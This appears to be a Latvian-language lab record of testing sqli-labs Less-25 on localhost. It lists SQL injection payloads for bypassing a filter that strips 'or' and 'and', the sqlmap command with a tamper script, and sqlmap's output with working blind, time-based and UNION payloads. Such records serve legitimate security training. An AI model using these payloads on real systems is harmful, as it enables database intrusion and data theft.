=================================================================================
1. Īpašība: tiek nodzēsti no pieprasījuma atslēgvārdi "or" un "and", kļūdas gadījumā ziņojums parādās tur pat, kur rezultāts
2. Nepiciešams tampering: jā, --tamper=between
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?id=-1' oorr 1=1-- -
3.2. error-based: ?id=-1'
3.3. time-based: ?id=-1' oorr sleep(1)-- -
3.4. union: ?id=-1' union select 1,2,3-- -
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 9072560 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-25/?id=1" -p id -risk=3 --level=5 --tamper=between

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 763 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: HAVING boolean-based blind - WHERE, GROUP BY clause
    Payload: id=1' HAVING 5988=5988-- cIcD

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: id=1' RLIKE SLEEP(5)-- gbaU

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3437' UNION ALL SELECT NULL,NULL,CONCAT(0x7162766271,0x476c61514a7649724b5067486974504a727169615873455847704d516550544c6377517a56566c42,0x71626a6a71)-- -
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
